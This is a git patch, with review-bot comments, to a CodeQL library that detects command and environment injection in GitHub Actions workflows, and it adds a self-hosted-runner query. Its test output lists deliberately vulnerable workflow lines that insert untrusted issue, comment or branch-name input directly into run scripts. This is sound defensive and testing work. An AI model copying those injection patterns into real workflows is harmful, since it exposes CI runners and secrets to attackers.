From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 26 Apr 2024 16:17:29 +0200 Subject: [PATCH 224/707] Improve Env path/var injection queries --- ql/lib/codeql/actions/Ast.qll | 4 + ql/lib/codeql/actions/ast/internal/Ast.qll | 19 +- .../actions/controlflow/internal/Cfg.qll | 8 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 33 +- .../dataflow/internal/DataFlowPrivate.qll | 3 +- .../security/ArtifactPoisoningQuery.qll | 7 +- .../security/EnvPathInjectionQuery.qll | 58 +- .../actions/security/EnvVarInjectionQuery.qll | 52 +- ql/lib/qlpack.yml | 2 +- .../CodeExecutionOnSelfHostedRunner.ql | 47 ++ ql/src/qlpack.yml | 2 +- ql/test/library-tests/test.actual | 598 ++++++++++++++++++ .../.github/workflows/sonar-source.yml | 75 --- .../CWE-077/.github/workflows/test1.yml | 20 +- .../CWE-077/.github/workflows/test2.yml | 34 +- .../CWE-077/.github/workflows/test3.yml | 47 +- .../CWE-077/.github/workflows/test4.yml | 29 +- .../CWE-077/.github/workflows/test5.yml | 36 ++ .../CWE-077/EnvPathInjection.expected | 20 +- .../Security/CWE-077/EnvVarInjection.expected | 39 +- .../PrivilegedEnvPathInjection.expected | 26 + .../CWE-077/PrivilegedEnvPathInjection.qlref | 1 + .../PrivilegedEnvVarInjection.expected | 53 +- .../Security/CWE-094/CodeInjection.expected | 6 +- .../CWE-094/PrivilegedCodeInjection.expected | 6 +- .../CWE-200/.github/workflows/test1.yml | 46 +- .../CWE-200/SecretExfiltration.expected | 20 +- .../CWE-284/.github/workflows/test1.yml | 28 + .../CWE-284/.github/workflows/test2.yml | 26 + .../CodeExecutionOnSelfHostedRunner.expected | 4 + .../CodeExecutionOnSelfHostedRunner.qlref | 2 + .../CWE-829/ArtifactPoisoning.expected | 52 +- .../PrivilegedArtifactPoisoning.expected | 78 +-- 33 files changed, 1061 insertions(+), 420 deletions(-) create mode 100644 ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql create mode 100644 ql/test/library-tests/test.actual delete mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/sonar-source.yml create mode 
100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test5.yml create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected create mode 100644 ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.qlref create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-284/.github/workflows/test2.yml create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.expected create mode 100644 ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 7c4bf9aa8af0..8e36aef408ec 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -298,6 +298,8 @@ abstract class Job extends AstNode instanceof JobImpl { Strategy getStrategy() { result = super.getStrategy() } predicate isPrivileged() { super.isPrivileged() } + + string getARunsOnLabel() { result = super.getARunsOnLabel() } } class LocalJob extends Job instanceof LocalJobImpl { @@ -352,6 +354,8 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } class Run extends Step instanceof RunImpl { string getScript() { result = super.getScript() } + ScalarValue getScriptScalar() { result = super.getScriptScalar() } + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7cc70c86d20d..0c53dae63717 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
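Review bot: The new public members `Job.getARunsOnLabel()` and `Run.getScriptScalar()` have no QLDoc, and these classes are the library's public API surface. Add `/** Gets a label from the job's `runs-on` field. */` and `/** Gets the scalar YAML node holding this step's script. */` above them. Both classes continue outside the hunks.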
@@ -579,10 +579,12 @@ class JobImpl extends AstNodeImpl, TJobNode { YamlMapping n; string jobId; WorkflowImpl workflow; + YamlMappingLikeNode runson; JobImpl() { this = TJobNode(n) and - workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n and + runson = n.lookup("runs-on").(YamlMappingLikeNode) } override string toString() { result = "Job: " + jobId } @@ -660,6 +662,19 @@ class JobImpl extends AstNodeImpl, TJobNode { // The enclosing workflow is privileged this.getEnclosingWorkflow().isPrivileged() } + + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(string lbl, YamlNode r | + ( + r = runson.getNode(lbl) and + not lbl = ["group", "labels"] + or + r = runson.getNode("labels").(YamlMappingLikeNode).getNode(lbl) + ) and + result = lbl.trim().regexpReplaceAll("^('|\")", "").regexpReplaceAll("('|\")$", "").trim() + ) + } } class LocalJobImpl extends JobImpl { @@ -865,6 +880,8 @@ class RunImpl extends StepImpl { string getScript() { result = script.getValue() } + ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } override string toString() { diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index f3785eada37c..0db8d63e6f3b 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -260,7 +260,11 @@ private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = rank[i](AstNode child, Location l | - (child = super.getInScopeEnvVarExpr(_) or child = super.getAnScriptExpr()) and + ( + child = super.getInScopeEnvVarExpr(_) or + child = super.getAnScriptExpr() or + child = super.getScriptScalar() + ) and l = child.getLocation() | child 
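Review bot: Binding the new field in the characteristic predicate, `runson = n.lookup("runs-on").(YamlMappingLikeNode)`, restricts `JobImpl` to jobs that have a `runs-on` key, so jobs that only have `uses:` (reusable-workflow calls) drop out of the class; if `ExternalJobImpl` extends `JobImpl` as `LocalJobImpl` does, those jobs vanish from the AST and from every query over `Job`. Keep the charpred as it was and bind the mapping inside the new predicate instead: `exists(YamlMappingLikeNode runson | runson = n.lookup("runs-on") and ( r = runson.getNode(lbl) and ... ) )`. The QLDoc on `getARunsOnLabel` also says it gets the `runs-on` field, whereas it yields one label at a time; `/** Gets a label from the job's `runs-on` field. */` is more accurate. `JobImpl` continues outside the hunk.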
@@ -291,3 +295,5 @@ private class InputTree extends LeafTree instanceof Input { } private class ScalarValueLeaf extends LeafTree instanceof ScalarValue { } private class ExpressionLeaf extends LeafTree instanceof Expression { } + +predicate test(ScalarValueLeaf f) { any() } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 4e0496150450..b24f9484a80e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -33,9 +33,13 @@ class AdditionalTaintStep extends Unit { predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run + ( + Utils::writeToGitHubEnv(run, _, value) or + Utils::writeToGitHubOutput(run, _, value) or + Utils::writeToGitHubPath(run, value) + ) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + succ.asExpr() = run.getScriptScalar() ) } @@ -85,12 +89,9 @@ predicate artifactToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Da exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and succ.asExpr() = run and - ( - Utils::writeToGitHubOutput(run, key, value) or - Utils::writeToGitHubEnv(run, key, value) - ) and + Utils::writeToGitHubOutput(run, key, value) and value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) ) } 
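Review bot: `predicate test(ScalarValueLeaf f) { any() }` appended to `Cfg.qll` looks like a leftover debugging aid: it is a public, undocumented predicate in an internal module that nothing on this page calls, and `any()` ignores its parameter. Drop it, or if it exists to keep `ScalarValueLeaf` referenced, make it `private` and add a one-line comment saying so.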
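Review bot: `value.matches("%$" + ["", "{", "ENV{"] + varName + "%")` in `envToRunStep` uses `varName` as part of a LIKE pattern, so an underscore in the variable name matches any single character and the pattern also accepts longer names sharing the prefix (`$FOO` matches `$FOO_BAR`); the same construction is used in the `EnvPathInjectionFromEnvVarSink` and `EnvVarInjectionFromEnvVarSink` hunks further down. This over-approximates rather than misses flows, so it is a precision issue; a `regexpMatch` with the name escaped and a non-identifier boundary after it, or exact checks for the `${NAME}` forms, would be tighter. The move from `indexOf(...) > 0` to `matches` does fix the earlier off-by-one that ignored a match at index 0.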
@@ -99,7 +100,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF exists(Run run, string key, string value, UntrustedArtifactDownloadStep download | c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and - pred.asExpr() = run and + pred.asExpr() = run.getScriptScalar() and // we store the taint on the enclosing job since the may not exist an implicit env attribute succ.asExpr() = run.getEnclosingJob() and Utils::writeToGitHubEnv(run, key, value) and @@ -110,12 +111,16 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF /** * A download artifact step followed by a step that may use downloaded artifacts. */ +predicate artifactDownloadToUseStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(UntrustedArtifactDownloadStep download, Run run | + pred.asExpr() = download and + succ.asExpr() = run.getScriptScalar() and + download.getAFollowingStep() = run + ) +} + class ArtifactDownloadToUseTaintStep extends AdditionalTaintStep { override predicate step(DataFlow::Node node1, DataFlow::Node node2) { - exists(UntrustedArtifactDownloadStep download, Run run | - node1.asExpr() = download and - node2.asExpr() = run and - download.getAFollowingStep() = run - ) + artifactDownloadToUseStep(node1, node2) } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 3cbb940131cd..f63af3c10be4 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -61,7 +61,8 @@ class DataFlowExpr extends Cfg::Node { this.getAstNode() instanceof Uses or this.getAstNode() instanceof Run or this.getAstNode() instanceof Outputs or - this.getAstNode() instanceof Input + this.getAstNode() instanceof Input or + this.getAstNode() instanceof ScalarValue } } 
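Review bot: The QLDoc `A download artifact step followed by a step that may use downloaded artifacts.` now sits above the new `artifactDownloadToUseStep` predicate, leaving the class `ArtifactDownloadToUseTaintStep` without documentation. Put a one-liner back on the class, e.g. `/** A taint step from an untrusted artifact download to the script of a later run step. */`, and let the predicate's comment describe the predicate.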
diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 95dc22a40def..8b7eb51276d9 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -299,7 +299,12 @@ class EnvVarInjectionRunStep extends PoisonableStep, Run { } class ArtifactPoisoningSink extends DataFlow::Node { - ArtifactPoisoningSink() { this.asExpr() instanceof PoisonableStep } + ArtifactPoisoningSink() { + exists(PoisonableStep step | + step.(Run).getScriptScalar() = this.asExpr() or + step.(UsesStep) = this.asExpr() + ) + } } /** diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a5cf2d600f01..25de24032ba2 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll 
@@ -5,23 +5,18 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envPathInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string value | - Utils::writeToGitHubPath(run, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvPathInjectionSink extends DataFlow::Node { } -predicate envPathInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubPath(run, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { + EnvPathInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubPath(run, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) + } } /** 
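Review bot: The removed `envPathInjectionFromExprSink` (a `${{ }}` expression inside the script of a run step that writes to `$GITHUB_PATH`) has no counterpart among the new sink classes — `EnvPathInjectionFromFileReadSink` here covers file reads, and the next hunk covers env-var and MaD sinks. Unless the new `ScalarValue` data-flow node together with a step from `Expression` to the script scalar (not visible on this page) now carries that case, this is a silent loss of coverage; a `CWE-077` test with an inline expression would confirm either way. The new `abstract class EnvPathInjectionSink` is a public extension point and should carry QLDoc, e.g. `/** A sink for environment-path injection; extend to add sinks. */`.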
@@ -32,26 +27,23 @@ predicate envPathInjectionFromFileSink(DataFlow::Node sink) { * run: | * echo "$BODY" >> $GITHUB_PATH */ -predicate envPathInjectionFromEnvSink(DataFlow::Node sink) { - exists(Run run, Expression expr, string varname, string value | - sink.asExpr().getInScopeEnvVarExpr(varname) = expr and - run = sink.asExpr() and - Utils::writeToGitHubPath(run, value) and - ( - value = ["$" + varname, "${" + varname + "}", "$ENV{" + varname + "}"] - or - value.matches("$(echo %") and value.indexOf(varname) > 0 +class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { + EnvPathInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string value | + this.asExpr().getInScopeEnvVarExpr(varname) = expr and + run.getScriptScalar() = this.asExpr() and + Utils::writeToGitHubPath(run, value) and + ( + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + or + value.matches("$(echo %") and value.indexOf(varname) > 0 + ) ) - ) + } } -private class EnvPathInjectionSink extends DataFlow::Node { - EnvPathInjectionSink() { - envPathInjectionFromExprSink(this) or - envPathInjectionFromFileSink(this) or - envPathInjectionFromEnvSink(this) or - externallyDefinedSink(this, "envpath-injection") - } +class EnvPathInjectionFromMaDSink extends EnvPathInjectionSink { + EnvPathInjectionFromMaDSink() { externallyDefinedSink(this, "envpath-injection") } } /** diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 0ae333a56f57..cdcc1dbdf818 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
@@ -5,33 +5,43 @@ import codeql.actions.dataflow.FlowSources private import codeql.actions.security.ArtifactPoisoningQuery import codeql.actions.DataFlow -predicate envVarInjectionFromExprSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string key, string value | - Utils::writeToGitHubEnv(run, key, value) and - expr = sink.asExpr() and - run.getAnScriptExpr() = expr and - value.indexOf(expr.getExpression()) > 0 - ) -} +abstract class EnvVarInjectionSink extends DataFlow::Node { } -predicate envVarInjectionFromFileSink(DataFlow::Node sink) { - exists(Run run, UntrustedArtifactDownloadStep step, string value | - sink.asExpr() = run and - step.getAFollowingStep() = run and - Utils::writeToGitHubEnv(run, _, value) and - // TODO: add support for other commands like `<`, `jq`, ... - value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) - ) +// predicate envVarInjectionFromEnvVarSink(DataFlow::Node sink) { +// exists(Expression expr, Run run, string varName, string key, string value | +// expr = run.getInScopeEnvVarExpr(varName) and +// Utils::writeToGitHubEnv(run, key, value) and +// expr = sink.asExpr() and +// value.matches("%$" + ["", "{", "ENV{"] + varName + "%") +// ) +// } +class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + EnvVarInjectionFromEnvVarSink() { + exists(Run run, Expression expr, string varname, string key, string value | + expr = run.getInScopeEnvVarExpr(varname) and + Utils::writeToGitHubEnv(run, key, value) and + run.getScriptScalar() = this.asExpr() and + value.matches("%$" + ["", "{", "ENV{"] + varname + "%") + ) + } } -private class EnvVarInjectionSink extends DataFlow::Node { - EnvVarInjectionSink() { - envVarInjectionFromExprSink(this) or - envVarInjectionFromFileSink(this) or - externallyDefinedSink(this, "envvar-injection") +class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { + EnvVarInjectionFromFileReadSink() { + exists(Run run, UntrustedArtifactDownloadStep step, string 
value | + this.asExpr() = run.getScriptScalar() and + step.getAFollowingStep() = run and + Utils::writeToGitHubEnv(run, _, value) and + // TODO: add support for other commands like `<`, `jq`, ... + value.regexpMatch(["\\$\\(", "`"] + ["cat\\s+", "<"] + ".*" + ["`", "\\)"]) + ) } } +class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { + EnvVarInjectionFromMaDSink() { externallyDefinedSink(this, "envvar-injection") } +} + /** * A taint-tracking configuration for unsafe user input * that is used to construct and evaluate an environment variable. diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f6efd7fa0f1c..1710768761fe 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.17 +version: 0.0.18 dependencies: codeql/util: ^0.2.0 codeql/yaml: ^0.1.2 diff --git a/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql new file mode 100644 index 000000000000..c7bdfbbc323c --- /dev/null +++ b/ql/src/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql 
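Review bot: The commented-out `predicate envVarInjectionFromEnvVarSink` block added above `EnvVarInjectionFromEnvVarSink` is dead code duplicating the class body beneath it; remove it rather than leaving two versions to drift. As in the sibling `EnvPathInjectionQuery.qll` hunk, the new `abstract class EnvVarInjectionSink` lacks QLDoc for what is now a public extension point, e.g. `/** A sink for environment-variable injection; extend to add sinks. */`.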
@@ -0,0 +1,47 @@
+/**
+ * @name Pull Request code execution on self-hosted runner
+ * @description Running untrusted code on a public repository's self-hosted runner can lead to the compromise of the runner machine
+ * @kind problem
+ * @problem.severity error
+ * @security-severity 9.0
+ * @precision high
+ * @id actions/pr-on-self-hosted-runner
+ * @tags actions
+ * security
+ * external/cwe/cwe-284
+ */
+
+import actions
+import codeql.actions.dataflow.ExternalFlow
+
+/**
+ * This predicate uses data available in the workflow file to identify self-hosted runners.
+ * It does not know if the repository is public or private.
+ * It is a best-effort approach to identify self-hosted runners.
+ */
+predicate staticallyIdentifiedSelfHostedRunner(Job job) {
+ exists(string label |
+ job.getEnclosingWorkflow().getATriggerEvent() =
+ ["pull_request", "pull_request_review", "pull_request_review_comment", "pull_request_target"] and
+ label = job.getARunsOnLabel() and
+ // source: https://github.com/boostsecurityio/poutine/blob/main/opa/rego/poutine/utils.rego#L49C3-L49C136
+ not label
+ .regexpMatch("(?i)^((ubuntu-(([0-9]{2})\\.04|latest)|macos-([0-9]{2}|latest)(-x?large)?|windows-(20[0-9]{2}|latest)|(buildjet|warp)-[a-z0-9-]+))$")
+ )
+}
+
+/**
+ * This predicate uses data available in the job log files to identify self-hosted runners.
+ * It is a best-effort approach to identify self-hosted runners.
+ */
+predicate dynamicallyIdentifiedSelfHostedRunner(Job job) {
+ exists(string runner_info |
+ workflowDataModel(job.getEnclosingWorkflow().getLocation().getFile().getRelativePath(),
+ "public", job.getId(), _, _, runner_info) and
+ runner_info.matches("self-hosted:true")
+ )
+}
+
+from Job job
+where staticallyIdentifiedSelfHostedRunner(job) or dynamicallyIdentifiedSelfHostedRunner(job)
+select job, "Job runs on self-hosted runner"
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 9e8fdef850a6..24f07dafe898 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
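Review bot: `runner_info.matches("self-hosted:true")` contains no `%` or `_` wildcard, so it is an exact string comparison; if `runner_info` is the bare flag, `runner_info = "self-hosted:true"` says so directly, and if it is a composite field holding several `key:value` entries the intended pattern is `"%self-hosted:true%"`, which as written never matches. The `^` and `$` anchors in the `regexpMatch` label pattern are redundant because `regexpMatch` already matches the whole string — harmless, but worth a word in the comment that cites the upstream regex. The `@description` speaks of a public repository while `staticallyIdentifiedSelfHostedRunner` cannot tell visibility, which its QLDoc already states; the dynamic predicate passes `"public"` to `workflowDataModel`, so that caveat could be narrowed to the static path.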
@@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.17 +version: 0.0.18 groups: - actions - queries diff --git a/ql/test/library-tests/test.actual b/ql/test/library-tests/test.actual new file mode 100644 index 000000000000..ee68d409634e --- /dev/null +++ b/ql/test/library-tests/test.actual 
@@ -0,0 +1,598 @@ +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| 
.github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ 
github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | 
steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | 